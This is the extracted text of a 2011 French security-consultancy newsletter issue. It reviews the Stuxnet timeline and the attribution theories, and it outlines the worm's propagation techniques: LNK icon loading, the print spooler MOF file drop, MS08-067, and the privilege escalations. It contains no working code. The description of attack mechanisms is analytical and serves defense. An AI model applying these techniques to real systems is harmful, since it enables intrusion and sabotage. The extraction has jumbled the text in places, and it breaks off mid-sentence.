Stuxnet. analysis, myths, realities


Published on

Published in: Automotive
  • Be the first to comment

  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Stuxnet. analysis, myths, realities

  1. 1. ACTUSÉCU 27 XMCO David Helan S ND REALITIE IS, MYTHS A  : ANALYS STUXNETC ON TEN TS S t u x n et : c om p l e te two-p a rt ar t icle o n T HE vir us o f 2010 K ey b o ard L ayo u t : a n a l ysi s of t he MS10-073 vulner abilit y used by St ux ne t C u r re n t n e w s : Top 10 ha c king t echniques, z ero -day IE, Gsdays 2 0 1 0 , P ro FTP D. .. B l o g s , s o f t wares an d o u r fav orite Twe e ts... This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [1]
  2. 2. ACTU SÉCU 27 A re y o u c o n c e r n e d b y I T s e c u ri t y i n y o u r c o m p a n y ? XMCO Partners is a consultancy whose business is IT security audits. Services: Intrusion tests Our experts in intrusion can test your networks, systems and web applications Use of OWASP, OSSTMM and CCWAPSS technologies Security audit Technical and organizational audit of the security of your Information System Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley PCI DSS support Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification. CERT-XMCO: Vulnerability monitoring Personalized monitoring of vulnerabilities and the fixes affecting your Information System CERT-XMCO: Response to intrusion Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy About XMCO Partners: Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing. At the same time, we work with senior management on assignments providing support to heads of information- systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts. To contact XMCO Partners and discover our services: WWW.XMCO.FR This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [2]
  3. 3. FEB. 2011 EDITORIAL N UMBER 2 7 We wish you a happy 2011… ACTUSECUThis is the first issue of ActuSécu certainly be implementation errorsin 2011. As usual, a very busy that may be exploited by pirates,year end made us a little late in especially as these are particularly Editor in chief:writing this issue. ingenious concerning hacking Adrien GUINAULT means of payment.The XMCO team is strengthened Contributors:with the arrival of Florent We hope that you find this issue Charles DAGOUATHochwelker, a security consultant interesting and we look forward to Florent HOCHWELKERcoming from SkyRecon. The seeing you at Black Hat Stéphane JINsecurity of the Windows kernel, Barcelona, for which XMCO is a François LEGUEDEP bypass and other tricks for partner. Frédéric CHARPENTIERhappily causing memory overflows Yannick HAMONno longer hold any secrets for him. Frédéric CharpentierFlorent has also written its first Chief Technology Officerarticle in this issue. CONTACT XMCOWhat will 2011 bring us in terms of actu_secu@xmco.frattacks and security? Without info@xmco.frwishing to gaze into a crystal ball,it is clear, for me, that 2011 will be THE XMCO AGENDAthe year of m-payment:contactless mobile payments (by PCI DSS QSA TRAININGNFC or GSM). Although these 7 and 8 March in Londontechnologies are, a priori, new, BLACKHAT EUROPEthey are based on existing and 16 and 17 March in Barcelonaproven frameworks. There will BLACK HAT This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [3]
  4. 4. STUXNET PART I P. 5 BOOKMARKS AND TOOLS P. 52 P. 13 CONTENTSSTUXNET... ...PART II Stuxnet Part I: analysis, myths and realities..5 An examination of THE virus of 2010 Stuxnet Part II: technical analysis.................13 Propagation, infection and attacks on industrial systems. Keyboard Layout vulnerability......................29 Analysis of the "elevation of privileges" vulnerabilityKEYBOARD P. 29 used by Stuxnet (MS10-073).LAYOUT Current news..................................................38 Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD... Blogs, software and extensions...................52 IMA, VMware compliance checker, Twitter and the rn_101 blog.CURRENT XMCO 2011NEWS P. 38 This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [4]
  5. 5. ACTU SÉCU 27 STUXNET PART I : ACTU SÉCU 27 Stuxnet, elected malware of the year HISTORY, MYTHS AND It would have been REALITIES inconceivable not to devote an article to THE malware of the year 2010. Although nearly everything has already been said on this subject, we could not resist wanting to write an article on Stuxnet several months after the media buzz has subsided. Much is still obscure concerning this malware, its origins and its developers. However, we will try to give a summary, also taking an objective view in relation to various papers covering the Karsten Kneese subject. To quickly reach its target, the malware also uses a If there is one thing to remember about 2010, it is surely password defined by default within certain SCADA the case of Stuxnet. This is because this malware, (Supervisory Control And Data Acquisition) systems. specifically produced to carry out the second highly- This is based on the Siemens SIMATIC WinCC publicized targeted attack of 2010 (after Aurora) software. caused comment for more than six months! This article is intended as a summary of this long period, which was punctuated by many new developments. It covers the “Stuxnet is a complex piece of malware development of the discoveries and announcements constructed from many items, intended to that took place during this period and tries to analyze all sabotage the normal functioning of certain the facts in order to draw conclusions. Between reminders on technical matters, genuine rumors and critical systems. ” false realities, this article will appraise the situation as Thanks to all the work performed by various completely as possible. researchers with an interest in malware, the role of Stuxnet has been clarified. The malicious code acts in Preliminary reminders several stages: firstly, a removable item of storage media is used to compromise a system on a local Stuxnet is a complex piece of malware constructed from network. Once present on a network, the malware many items, intended to sabotage the normal replicates, moving towards the discovery of a point of functioning of certain critical systems. In contrast to access to its target: a system on which WinCC is the somewhat indiscreet approach which is used to installed. WWW.XMCO.FR access these sensitive systems, this sabotage is intended to be very discreet. Secondly, when such a target is discovered, the To approach its target, Stuxnet exploits at least four behavior of the various items controlling the target zero-day vulnerabilities (currently all corrected by architecture is modified in order to physically impair Microsoft) targeting different versions of Windows, as the integrity of the industrial production system. In the well as the famous MS08-067 vulnerability that was case of Stuxnet, this concerns modifying the normal corrected several years ago. function of certain critical systems by manipulating their controllers. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [5]
  6. 6. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27History the Metasploit framework. This allowed control of a system to be taken over remotely by exploiting theIt is difficult to create a comprehensive history of the security vulnerability through WebDAV sharing. Thisevents relative to Stuxnet because of the numerous code allowed a pirate simply to encourage an Internetnew developments and announcements during this long user to visit a web page with Internet Explorer to takeperiod. Limiting ourselves to the dates of the control of the underlying system. The same daydiscoveries made and publicized by the researchers Symantec renamed W32. Temphid to W32.Stuxnet, andwould not really make sense. It is necessary to consider Siemens reported that the company was in the processthe period before the media took an interest in this of studying reports referring to the compromise ofsubject, as this attack is so complex. We are therefore several SCADA systems linked to WinCC.going to try, with hindsight, to trace a history that takesinto account the dates before the beginning of the On 20 July, Symantec announced that it hadmedia interest in this sabotage campaign. Also, all this discovered how the malware communicated with itstakes into account discoveries made after this attack command and control (C&C) servers, and the meaningattracted media interest. of the exchanged messages. On 21 July, MITRE assigned referenceFrom Stuxnet CVE-2010-2772 to the security vulnerability present within the Simatic WinCC and PCS 7 software fromEverything officially began on 17 June 2010, when the Siemens. A password had been hard-coded and couldBelarusian company Virusblokada published a report on be used to access certain components of Siemensthe virus RootkitTmphider, mentioning the LNK applications with elevated vulnerability. This vulnerability, which waszero-day in June 2010, allows a pirate to execute code Two days afterwards, on 23 July, VeriSign revoked thewhen opening a directory, whether it is shared (SMB, certificate belonging to JMicron Technology Corp.WebDAV), local or on a mass-storage peripheral(external hard disk, USB drive, portable telephone, MP3player, etc.). The vulnerability gradually began to “On 17 July, Symantec renamedarouse comment. MITRE dedicated reference "W32.Temphid" as "W32.Stuxnet" andCVE-2010-2568 to it the following 30 June, and on 13July, Symantec added the detection of this virus under Siemens reported that the company was inthe name of W32. Temphid. the process of studying reports referring to the compromise of several SCADA systemsThe next day, on 14 July, MITRE assigned references linked to WinCC ”CVE-2010-2729 and CVE-201 0-2743 to securityvulnerabilities present in the print spooler and in thekeyboard management. Two days afterwards, on 16 Then several days passed, during which theJuly, Microsoft published a security alert referenced researchers and specialists involved in this studyKB2286198. This last concerned the security certainly did not stop working. On 2 August, outside itsvulnerability exploited by the malware. The "Patch Tuesday" cycle, Microsoft published its securitymanagement of LNK files was then clearly identified as bulletin MS10-046 proposing several patches for theproblematic by the software publisher. At the same time, LNK vulnerability. On 6 August, Symantec presentedVeriSign revoked the certificate belonging to Realtek the method used by Stuxnet to inject and hide code onSemiconductor Corp. This was because it had been a PLC (Programmable Logic Controller).used by pirates to sign certain drivers used by theirmalware. Symantec subsequently revealed that the first On 14 September, Microsoft published a new securitymalware, which had a driver signed by the certificate bulletin (MS10-061) and offered a patch for the securityand which was identified as coming from the Stuxnet vulnerability present within the print spooler that wasfamily, went back to January 2010. discovered by Symantec in August. The same day, MITRE assigned reference CVE-2010-3338 to theOn 17 July, the antivirus publisher ESET detected new "elevation of privileges" vulnerability that was identifiedmalware coming from the Stuxnet family. This used a within the task scheduler.certificate belonging to JMicron Technology Corp. to Just several days afterwards, on 17 September,sign one of its components. On 19 July, a year after Joshua J. Drake (jduck1337) published exploitationivanlefOu had published a proof of concept, the code within the Metasploit framework. This allowedresearcher HD Moore published exploitation code within control to be taken of a system via the security This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![6]
  7. 7. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27vulnerability present within the Windows print spooler. knowledge that was necessary, the human andLastly, to end the month of September, the publishers of material resources necessary and lastly, the cost ofthe antivirus solutions ESET and Symantec published a such an organization make certain countries idealfirst version of their report, on 30 September, suspects. Among the list chosen by the researcher werepresenting their almost-complete analyses of the Israel, the United States, Germany and Russia.malware. In fact, both publishers did not wish todisclose information on vulnerabilities that had not yet Trey Ratcliffbeen corrected by Microsoft.The following month, on 20 November, Joshua J.Drake published new exploitation code within theMetasploit framework to exploit the vulnerability presentwithin the Windows task Scheduler.Finally, to prevent the exploitation of the last securityvulnerability exploited by Stuxnet, Microsoft, on its"Patch Tuesday" of 12 October, published its securitybulletin MS10-073 that gave a patch for the vulnerabilityrelated to the management of the keyboard. Then, aftertwo months of waiting, in its "Patch Tuesday" of 14December, Microsoft published its security bulletinMS10-092 offering a patch to correct the securityvulnerability related to the task scheduler.The progress made by Ralph LangnerThanks to the work done by the German researcherRalph Langner, which began as soon as the mediabegan to take an interest in the malware, it has beenpossible to identify numerous trails related to the originof Stuxnet, to its potential targets and to the people whoare hiding behind this attack. Of course, all informationpublished by this former psychologist should be treatedwith caution. Even so, it appears, with hindsight, thatmany opinions that he gave have been subsequentlyvalidated by other researchers (such as Symantec) orby documents coming from third-party sources. On 15 November, Langner presented a technicalOn 16 September, Langner announced that Iran, and solution allowing the malicious code 315 to destroyparticularly the nuclear power station at Bushehr, gas centrifuges. He was then supported by the nuclearwhich was built in cooperation with Russia, was the specialist from ISIS (Institute for Science andmain target. The researcher was also the first to speak International Security), David Albright. On the same day,of cyber war. On each following day, he published new a second announcement gave the details of the attackhypotheses and new discoveries. The researcher performed by the code 417. In the days that followed,approached numerous entities, such as Congress, the numerous details of this second attack were presentedDHS and the INL in the United States, and also and a hypothesis concerning the targets was given:appeared on television. On 13 November, Langner according to the researcher, the code 315 targeted theannounced, just after Symantec, that he had come to IR-1 centrifuges present in the Natanz enrichmentthe same conclusions concerning the malicious code centre, while module 417 targeted the steam turbines in315 and the PLCs targeted. He took advantage of this WWW.XMCO.FR the electrical power station at Bushehr. A singleto present the K-1000-60/3000-3 steam turbines weapon, malware, which contained two payloads: themanufactured by the Russian manufacturer "Power code modules 315 and 417, targeting different PLCs.Machines" which, according to him, equipped theBushehr nuclear plant. The following day, he presented At the end of November, the former psychologisthis analysis concerning the entity that probably ordered announced that Iran and Venezuela had concluded anthis attack: for him, only a government could have been agreement in 2008. This alliance allowed Iran to installinvolved in such a scenario: the complexity of the ballistic missiles on Venezuelan territory in exchange for This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![7]
  8. 8. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27the help provided by Iran in setting up a nuclear agreement, one month before the end of his term ofprogram in the host country. A situation in which the office in January 2009, to the establishment of aUnited States would surely not be delighted to find secret program aiming to sabotage the electrical anditself; and therefore, in his opinion, a justification for the computer systems at the main uranium enrichmentestablishment of this secret program. centre at Natanz. From the beginning of his term of office, Barack Obama, who had been informed of thisAt the end of December, helped by the publication of before taking office, accelerated this program on thethe report from ISIS, which gave an analysis of the advice of those knowledgeable concerning the case ofnuclear infrastructure situation reported by the Iran.inspectors from the International Atomic Energy Agency(IAEA ), Langner announced that he had discoveredthe precise target of the malware, and more precisely,of block 417. This was the safety system associatedwith cascades of centrifuges used to enrich uranium. Inhis opinion, the PLCs targeted were used every twoyears in the functioning of an enrichment centre such asNatanz. Trey Ratcliff“A single weapon, malware, whichcontained two payloads: the code modules315 and 417, targeting different PLCs ... ”At the beginning of January, the researcher presented anew hypothesis on the role of blocks 315 and 417.According to him, their main objective was not thedestruction of the centrifuges, but rather to make theseproduction systems massively inefficient. Byanalyzing the data embedded in the code, andtheoretical calculations on the yield of uraniumproduction, the researcher discovered that theoperations performed by the two blocks of code woulddrastically reduce the yield of the centrifuges.To summarize, over the course of these few months,Langner was probably the researcher whocommunicated most concerning Stuxnet. Still according to the New York Times journalists, thisThe "New York Times" theory program was based on work performed at the Idaho National Laboratory (INL) in partnership with theFor the first time since the beginning of this scenario, an Department of Homeland Security (DHS) and Siemens.article published by the New York Times on 16 January During 2008, they claim that Siemens requested thedescribed a plausible scenario. Even though this INL to test the security of its Step7 software used toscenario is based more on a correlation between events control a set of industrial systems (tools, probes, etc),and facts, rather than on tangible proof, these authors using controllers such as PCS7 (Process Control WWW.XMCO.FRhave the distinction of being among the first to officially System 7). The results obtained, including numerousname the various protagonists. It should therefore be security vulnerabilities, were presented in July at ataken with caution and is the responsibility only of the conference that was held in Chicago.journalists who wrote the New York Times article. Several months later, American diplomacy succeeded inIn this scenario, the United States set up a plan to establishing an embargo on certain componentshinder Iran in its quest to produce nuclear weapons. necessary to the correct functioning of a uraniumAccording to the journalists, President Bush gave his enrichment centre. According to a diplomatic cable This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![8]
  9. 9. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27revealed by Wikileaks, in April 2009, 111 Siemens Israel of having ordered these assassinations. After thiscontrollers necessary to controlling a uranium second suspect event, the Iranians took the decision toenrichment cascade were therefore blocked at the port "hide" Mohsen Fakrizadeh, the third (and last?)of Dubai in the United Arab Emirates. nuclear specialist.At the end of 2010, the Institute for Science and Ludo BenoitInternational Security (ISIS) reported that 984 defectivecontrollers had been replaced at the end of 2009according to a report by inspectors from the IAEA.Strangely, this figure exactly corresponds to the numberof Siemens controllers contained within an enrichmentcascade. Nevertheless, what is the relationshipbetween these 984 defective controllers and Stuxnet?These controllers were replaced between the end of2009 and the beginning of 2010, while Stuxnet made itsfirst public appearance at the beginning of 2010although it was not yet identified.The article presents Israel as a principal ally of theUnited States in manufacturing and testing thismalware. This "small" country, which is highly advancedtechnologically, and particularly in cyber-warfare, isalleged to have built a replica of the Natanz enrichmentcentre in its own nuclear research centre: Dimona. Thejournalists gave two reasons for this alliance. Amongthe Americans other allies, none of them would be ableto make the IR-1 centrifuges work properly. These werederived from the Pakistani P-1, which themselves werecopied from plans of the German G-1 stolen by thedoctor of physics Abdul Qadeer Khan (father of thePakistani nuclear bomb and in charge of a networkspecialized in the sale of nuclear material that helped tospread sensitive technology to Iran, North Korea andLibya). The second reason was that Israel had longbeen openly seeking to prevent Iran from obtaining Forbess counter theorynuclear weapons. Another article published by journalists at Forbesʼ the following day strongly criticized this analysis. According“In this scenario described by the Times, to them, this was based on no tangible proof. Only gestures made by certain diplomats at pressthe United States is alleged to have set up a conferences and the content of several diplomaticplan to hinder Iran in its attempt to cables revealed by Wikileaks gave any support to the journalists article.produce nuclear weapons. ” The journalists took advantage of trashing this theory toAccording to the authors of this article, other information push their own analysis that was published inrevealed the magnitude of this American program. December. According to them, the "real" powers behindMassoud Ali Mohammadi, an Iranian nuclear Stuxnet were Finland and China. The reasoning behindspecialist, was killed in January 2010 by an explosion this was that Vacon, the Finnish manufacturer of WWW.XMCO.FRcaused by a remotely-triggered bomb fixed to a frequency converters (variable frequency drives) hadmotorbike. On 29 November 2010, when Iran a manufacturing plant in China. This would mean thatrecognized for the first time that Natanz had suffered China would know precisely which PLCs to target.damage related to Stuxnet, a second physicist, Majid Furthermore, China is suspected to have access to partShahriari, was the victim of a second fatal "accident". of the source code of Windows, which could explain theOn both of these occasions, president Mahmoud discovery and use of four zero-day vulnerabilities.Ahmadinejad directly accused the United States and This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![9]
  10. 10. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27Numerous other details relating China and Finland were and rescue, was controlled by a SCADA system basedalso revealed by the journalists to support their theory. on Siemens S7-400 and SIMATIC WinCC PLCs. ThisFor example, RealTek Semiconductor, the Taiwanese announcement occurred during a complex period incompany whose certificate was stolen to sign the Indo-Chinese relationships, because both countries aredrivers, has an establishment in the industrial zone of fiercely competing with each other in the aerospaceSuzhou, in China, not far from Vacon. Finally, China sector to be the first Asian country to put a man on thewas relatively untouched by the worm. moon. Although Symantec and other publishers of anti-virus software named Iran as the main victim of Stuxnet, it was not before mid-October that the subject of Stuxnet was publicly mentioned by Iran. During this first speech, the Iranian president simply denied the damage that the worm was supposed to have caused to national infrastructure. A month later, in November, the country recognized for the first time that it had suffered "slight" problems leading to the postponement of the launch of the Bushehr plant. In reaction to this attack, the government arrested some Russian service contractors suspected of being spies. These were subsequently released Since the beginning of 2011, numerous other events were added to this story. Symantec, by recovering samples obtained from various publishers of antivirus software in the market, was able to make a statistical study of the attacks. So, thanks to the 3,280 samples recovered from ESET, F-Secure, Kaspersky, Microsoft, McAfee and Trend Ludo Benoit Micro, Symantec was able to draw the following conclusions: - exactly five organizations were targeted;Lastly, very many international experts criticized the these five organizations are all present in Iran;quality of the code in the malware. Several - most of the 12,000 infections corresponding to thecommentators criticized the amateurism of certain 3,280 samples can be traced to these variousfunctionalities of Stuxnet: the very basic component that organizations;communicates with the C&C servers (for example, no - among the victims used as vectors for propagation,communications encryption, the lack of robustness of three were attacked once, one was targeted twice andthe control servers, etc), the absence of additional the third was attacked three times;protection (polymorphism, anti-debug and robust - these attacks took place at very precise dates: in Juneencryption), and finally an indiscreet means of 2009, one month later in July 2009, then at three furtherproliferation that is unworthy of an attack carried out stages in March, April and May 2010;discreetly by the military, etc. According to these - lastly, three variants of the malware corresponding tocommentators, just these observations are evidence the attacks that took place in June 2009, April 2010 andthat no government is hiding behind Stuxnet. May 2010 were observed. The existence of a fourth variant is assumed but has not been observed among WWW.XMCO.FR the samples obtained. According to Symantec, these five companies areThe other factors to be remembered suppliers with links to the Natanz enrichment centre.On 9 July, the Indian satellite INSAT-4B was declared From these samples Symantec was able to produceinoperable. This satellite, which was used for graphs representing the proliferation of the malware.transmitting telecommunications, television For this, the researchers used the information recordedbroadcasting, meteorology and for individual search (date and time, for example) by the malware when it This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![10]
  11. 11. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27infects a new system. These graphs clearly highlight thefive dates corresponding to the attacks and the numberof targets initially contaminated during each of theseevents.“In April 2009, the researcher CarstenKohler published an article in themagazine Hackin9 presenting a securityvulnerability within the Windows printspooler. No one reacted, not evenMicrosoft, which was clearly concerned. ”The day after this announcement, several mediaechoed another announcement that was particularlysurprising. During a video shown at a party given inhonor of the retirement of general Gabi Ashkenazi, andpublished by the conservative newspaper Haaretz, itwas claimed that the newly-retired general hadsupervised the creation of Stuxnet. Nevertheless, asno official Israeli source has corroborated thisannouncement, it must be taken with caution. Lastly, it was in March 2010 that the first malware in the Stuxnet family appeared which exploited the LNKThe warning signs vulnerability.The Stuxnet affair began well before 2010. Thus,Symantec was able to find traces of the malware goingback to 2008. On 20 November 2008, Symantec Conclusionobserved the exploitation of the LNK vulnerability forthe first time. This had not been analyzed at the time Stuxnet has caused a lot of comment and beenand we had to wait until the appearance of Stuxnet to highly publicized. The various theories, analysesdiscover that pirates had known about this vulnerabilityfor more than two years. The virus in question was then and hypotheses made until now do not allow anyidentified as "Trojan.Zlob" and does not appear to be conclusions to be drawn with certainty, eitherrelated to Stuxnet. concerning those ordering the attacks or the targets. However, according to the variousIn April 2009, the researcher Carsten Kohler publishedan article in the magazine Hackin9 presenting a discoveries made by several researchers andsecurity vulnerability within the Windows print journalists (Symantec, Langner and the New Yorkspooler. No one reacted, not even Microsoft, which Times), Iran seems to have been targeted,was clearly concerned! Several months later, in June2009, Symantec detected a new malware that is now especially the nuclear enrichment centre at Natanz.identified as the first version of Stuxnet. This was very Concerning those ordering the attack, and bearingsimple and did not carry all of the payloads that we in mind its complexity, the resources used and theknow today. According to Symantec, it was in January2010 that the first malware in the Stuxnet family different information revealed by the journalists,appeared using the certificate from Realtek Israel and the USA appear to have played a role in WWW.XMCO.FRSemiconductor Corp. to sign one of the components of this affair. We must also bear in mind that all of thethe malware. information revealed by the various observers is always subjective… This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![11]
  12. 12. STUXNET PART I : HISTORY, MYTHS AND REALITIES ACTU SÉCU 27References Resources on Stuxnet F-Secure (FAQ)h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s /00002040.htmlh t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s /00002066.html" Timeline" CERT-ISTh t t p : / / w w w. c e r t - i s t . c o m / f r a / r e s s o u r c e s /Publications_ArticlesBulletins/VersVirusetAntivirus/stuxnet/"" New York Times" Forbes WWW.XMCO.FR This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![12]
  13. 13. ACTU SÉCU 27 STUXNET PART II: Stuxnet, elected malware of the year TECHNICAL ANALYSIS After having looked at the history of Stuxnet and the theories and assumptions behind it, let us now look at its technical analysis. Some very good white papers (Symantec and ESET) have given a detailed presentation of the complexity of this malware. We will try to summarize everything to give an understanding of the propagation modes used, the relationships with industrial systems and the consequences that Stuxnet may cause. Bjoern Schwarz Charles Dagouat The second phase corresponds to the attack itself: this General functioning is the search for a target. Stuxnet is a complex piece of malware. Its functioning mode revolves around two main "functions": the “Stuxnet is a complex piece of malware. Its propagation of the virus, which is based upon the vulnerabilities inherent in the Windows platform, and the functioning mode revolves around two attack on SCADA systems, which is focused on WinCC main "functions": the propagation of the and PCS7. virus, which is based upon the vulnerabilities inherent in the Windows This second function corresponds to the payload transported by the malware. It is based on the software platform, and the attack on SCADA component WinCC. WinCC is a very widespread tool systems, which is focused on WinCC and for remote monitoring and data acquisition developed PCS... ” by Siemens. Installed on a Windows system, it is used to control an automatic system such as a In the case of Stuxnet, the target is a Siemens WinCC Programmable Logic Controller (PLC). This type of control and monitoring system linked to certain PLCs. If architecture is particularly adapted to critical such a system is detected, its behavior is then infrastructure such as can be found in industry. discreetly impaired. Lastly, the final phase corresponds WWW.XMCO.FR to the material consequence of this modification. The To fulfill its task, Stuxnets functioning is governed by a undetectable effect discreetly acts on the system in very specific scenario. The architecture of the malware order to slowly destroy it. is built around several main functionalities that correspond to the different stages in the attack process. The first stage is not characteristic of Stuxnet, but corresponds to the majority of worms: it is the propagation phase. During this phase, the malware seeks to spread within a given area. the local network. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [13]
  14. 14. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Phase I: malware propagation Exploitation of this vulnerability simply requires a user to open a malicious directory. Exploitation code hasPhase 1 of the attack carried out by Stuxnet therefore already been published within the Metasploitcorresponds to the proliferation of the malware within installed base of computers. For this, the authors ofStuxnet used no less than four zero-day vulnerabilities Using this, a pirate only needs to get an Internet user totargeting various components of Windows. But this access an Internet address with Internet Explorer topropagation function may itself be subdivided into take control of the remote system. In this proof ofseveral sections: the first corresponds to compromising concept, the server forces the client to open a sharedWindows systems and the second corresponds to the file using the WebDAV protocol.long-term installation of the virus on a compromisedsystem. “The authors of Stuxnet used no less thanThe main points of entry chosen by the developers of four zero-day vulnerabilities targetingStuxnet to penetrate the target infrastructure areremovable storage media such as USB drives and various components of Windows... ”other portable hard drives. Those behind the attack aretherefore mainly relying on human intervention to carrythe virus from one system to another. A user observing the content of a USB drive infected by Stuxnet can see the following six files: - Copy of Shortcut to.lnk ;Main attack vector: removable storage media - Copy of Copy of Shortcut to.lnk ; - Copy of Copy of Copy of Shortcut to.lnk ;The vulnerability in question is related to how the - Copy of Copy of Copy of Copy of Shortcut to.lnk ;Windows operating system manages shortcuts. This - ~WTR4141.TMP ;type of file corresponds to the extensions ".LNK" and - ~WTR4132.TMP.".PIF". More precisely, the vulnerability relates to theway that the icon for the link is loaded. This image is The various shortcuts entitled "Copy of (... ) Shortcutnormally loaded from a CPL (Windows Control Panel) tO.lnk" correspond to different versions of Windows.file using the system function "LoadLibraryW()". In These links all load the library "-WTR4141.tmp" which,reality, a CPL file is just a DLL. By specifying the in turn, loads the file "-WTR4132.TMP".appropriate information as the access path to amalicious DLL in the section "File Location Info" of aLNK file, a pirate is therefore able to force any Windowssystem to execute arbitrary code by simply displayingthe content of a directory. After having officially acknowledged the security vulnerability by publishing the security alert referenced KB2286198 on 16 July, Microsoft quickly reacted by WWW.XMCO.FR publishing its bulletin MS 10-046 and the associated patches on 2 August, outside its "Patch Tuesday", which was planned for eight days later, the following 10 August. This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![14]
  15. 15. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Additional attack vectors: local network installed on a Windows system, the malware has several functionalities that allow it to work as part of aHowever, Stuxnet does not only rely on help from users network. Among these, the malware installs an RPCto spread. For this, it also uses two other security faults server that allows it to communicate various items ofthat can be remotely exploited within a local network. information with other infected systems present on theThe first relates to the Microsoft print spooler, while the LAN.second targets the old vulnerability present within theserver service (MS08-067). Print spoolerThis security vulnerability was initially presented in the INFOmagazine Hackin9 during 2009. When a printer is Provision of free tools for getting rid ofshared on a system, a user is able to "print" (read and malware, including Stuxnet.write) files in the "%System%" directory. Exploitation ofthis security vulnerability takes place in two phases. The BitDefender and Microsoft have just madefirst consists of depositing the files "winsta.exe" and free tools available for getting rid of"sYsnuIlevnt.m0f" respectively in the directories the most currently-fashionable malware."WindowsSystem32" and "WindowsSystem32wbem After publishing a tool last month formof". getting rid of Zeus (see CXA-2010-1211), BitDefender has just published anotherThe second phase in exploiting this vulnerability tool for deleting the Stuxnet malware.consists of executing the script "sysnullevnt.mof". This As a reminder, the malware was detectedfile, in MOF ("Managed Object Format"), is used to for the first time by a company based inforce Windows to execute the code contained in the file Belarus (see CXA-2010-0893), following"winsta.exe". Execution of this script is automatic. This the discovery of the zero-day LNKis because the MOF files placed in the directory security vulnerability affecting all"WindowsSystem32wbemmof" are automatically versions of Windows (see CXA-2010-0906).compiled by "mofcomp.exe" to record the WMI contextthat triggers the execution of the script. Microsoft has just updated its "malicious software removal tool", whichThis security vulnerability was corrected by Microsoft can now deal with the most virulentwhen it published its bulletin MS10-061, which added a botnet that is currently known: Zeus/series of checks before allowing a document to be ZBot. Zeus is malware that is constantlyprinted. being developed, and which mainly aims to steal banking information. Server service The two tools can be downloaded via the following links:Lastly, Stuxnet exploits the old MS08-067 securityvulnerability in the server service. This vulnerability, Sutxnet :which at the time was massively exploited by Confikerl index.php?app=downloads&showfile=12Downadup, is used here to deposit a file in shareddirectories of the C$ or Admin$ type. The execution ofthis file is planned the day following compromise, using Zbot :the task scheduler. It appears that the shell code used the malware to carry out these two actions is 2010/10/12/msrt-on-zbot-the-botnet-in-a-relatively advanced, in contrast to that which was used box.aspxby Confiker. WWW.XMCO.FRThis security vulnerability was corrected by Microsoftwhen it published bulletin MS08-067." " "The exploitation of these various security vulnerabilitiesallows malware to distribute itself both on a localnetwork and, more widely, on all systems on whichusers can connect removable storage media. Once This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![15]
  16. 16. STUXNET PART II: TECHNICAL ANALYSIS ACTU SÉCU 27Phase II: installation of the malware Stuxnet therefore adds a task which calculates theThe long-term installation of the malware requires associated CRC32 hash, "manually" changes the file tocertain actions that involve elevated privileges. The raise the privileges associated with it, adds a commentexploitation of the security vulnerabilities presented field and fills it with random data to provoke a collision.previously does not allow elevated privileges to be The task is then executed with the highest privileges.obtained. In order to ensure maximum dissemination,two security vulnerabilities are therefore exploited by This security vulnerability was corrected by MicrosoftStuxnet in order to elevate its privileges once the when it published bulletin MS10-092, which changedsystem has been compromised. the hash function used. The CRC-32 hash function was replaced by SHA-256. This algorithm is consideredThese two vulnerabilities cover all existing versions of secure against collision attacks.Windows. The first can locally elevate its privileges onold versions of the operating system: There remains an unknown factor. According toWindows 2000 and XP; while the second can perform Microsoft, these two security vulnerabilities respectivelythe same operation on more recent versions of the OS: targeted Windows XP and 2000 for the keyboardWindows Vista, 7 and 2008. management, and Windows Vista, 7 and 2008 for the task scheduler. It would appear that the technique usedThe first vulnerability relates to the way the keyboard by Stuxnet to install itself on Windows Server 2003 isis managed by the driver "Win32k.sys". An index is unknown, or that the malware has excluded thisloaded from a shared library without verification. This platform from its targets.operation allows the malware to force the systemskernel to execute code controlled from the user area.This security vulnerability is described in detail in thearticle on page 29 and was corrected by Microsoft when 